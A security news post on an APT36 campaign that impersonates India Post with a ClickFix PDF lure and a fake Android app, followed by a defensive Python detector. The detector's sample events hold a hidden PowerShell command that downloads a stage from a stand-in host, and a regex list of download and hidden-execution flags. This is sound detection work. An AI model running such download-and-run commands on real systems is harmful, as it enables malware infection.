NEWS APT36 Targets Windows and Android via Fake Postal Service

ExcalibuR

Public trust in government services becomes the perfect loophole for hackers.

The APT36 group, linked to Pakistan, has launched a malicious campaign disguised as the official website of India Post. The fake domain, postindia[.]site, targets two categories of users — Windows and Android device owners — using separate infection methods: a malicious PDF file and a fake mobile app, respectively.

When accessing the site from a computer, users are prompted to download an "official" document. However, it hides instructions that use the "ClickFix" technique — the victim is asked to press Win + R and paste a PowerShell command into the dialog box. Once executed, the computer connects to an external server and downloads the next stage of the malware. Although the server is no longer active, the file itself is still circulating online.

Metadata from the PDF file identifies the author as “PMYLS,” which may hint at a Pakistani youth laptop distribution initiative. The domain impersonating India Post was registered a month after the PDF was created, in November 2024, confirming the attack was premeditated.

On mobile devices, a different infection method is used. Users are offered an “India Post” app for “convenience,” but in reality it’s a malicious program with elevated privileges. The app collects personal data — contacts, location, and external storage content. It stealthily changes its icon to mimic “Google Accounts,” making detection and removal more difficult.

Special attention was paid to the persistence of the malware — it starts automatically after reboot, ignores battery optimization settings, and can even force-enable required permissions if the user initially denies them.

Researchers from CYFIRMA, who analyzed the campaign, moderately attribute the attack to APT36 — also known as Transparent Tribe. The group is well-known for targeting Indian citizens through a combination of social engineering and exploitation of technical vulnerabilities.

The fact that both PCs and mobile devices are attacked simultaneously highlights the increasingly sophisticated and multi-platform approach of APT groups. The use of fake government-branded apps to distribute malware is particularly alarming given the trust users place in such services.

There is currently no evidence of mass distribution, but the nature of the attack and its selected targets suggest preparations for a broader campaign. Users are advised to be cautious when downloading files or apps from unknown sources, even if they visually resemble official websites.
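The "ClickFix" lure described in the post leaves two defender-visible traces on a Windows host: the pasted command lands in the user's Win+R history (the RunMRU registry key), and the interpreter is spawned directly by explorer.exe with a hidden-window or download flag. The following is an added detection example written for this post, not code from the original article or from CYFIRMA; the log line format and the sample events are constructed to stand in for Sysmon/EDR telemetry.

```python
import re
from typing import Dict, List

# Constructed sample telemetry (hypothetical key=value export, not real logs):
# one Win+R history (RunMRU) value and two process-creation events.
SAMPLE_EVENTS = [
    'type=registry path=HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion'
    '\\Explorer\\RunMRU\\a data="powershell -w hidden -c iwr http://example.invalid/stage"',
    'type=process parent=explorer.exe image=powershell.exe '
    'cmdline="powershell -w hidden -c iwr http://example.invalid/stage"',
    'type=process parent=cmd.exe image=powershell.exe '
    'cmdline="powershell -File C:\\scripts\\backup.ps1"',
]

# Tokens typical of a one-liner meant to be pasted and run silently.
SUSPICIOUS_CMD = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\b|\biwr\b|\birm\b|"
    r"invoke-webrequest|downloadstring|\bcurl\b|\bmshta\b)", re.I)
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}


def parse_event(line: str) -> Dict[str, str]:
    """Split a key=value line; values may be double-quoted."""
    out = {}
    for m in re.finditer(r'(\w+)=(?:"([^"]*)"|(\S+))', line):
        out[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return out


def is_clickfix_like(ev: Dict[str, str]) -> bool:
    """Flag Win+R history or explorer-spawned interpreters carrying a download/hidden flag."""
    if ev.get("type") == "registry" and "\\RunMRU\\" in ev.get("path", ""):
        data = ev.get("data", "").lower()
        uses_interp = any(i.split(".")[0] in data for i in INTERPRETERS)
        return uses_interp and bool(SUSPICIOUS_CMD.search(data))
    if ev.get("type") == "process":
        # Win+R launches the interpreter as a direct child of explorer.exe,
        # unlike scripts started from a shell, scheduler or IDE.
        return (ev.get("parent", "").lower() == "explorer.exe"
                and ev.get("image", "").lower() in INTERPRETERS
                and bool(SUSPICIOUS_CMD.search(ev.get("cmdline", ""))))
    return False


def find_clickfix(lines: List[str]) -> List[Dict[str, str]]:
    """Return the parsed events that match the ClickFix pattern."""
    return [ev for ev in map(parse_event, lines) if is_clickfix_like(ev)]


if __name__ == "__main__":
    for hit in find_clickfix(SAMPLE_EVENTS):
        print("ClickFix-like:", hit.get("data") or hit.get("cmdline"))
```

The third sample (PowerShell launched from cmd.exe with a plain script path) is left alone, which is the distinction that keeps this rule from firing on ordinary administrative use.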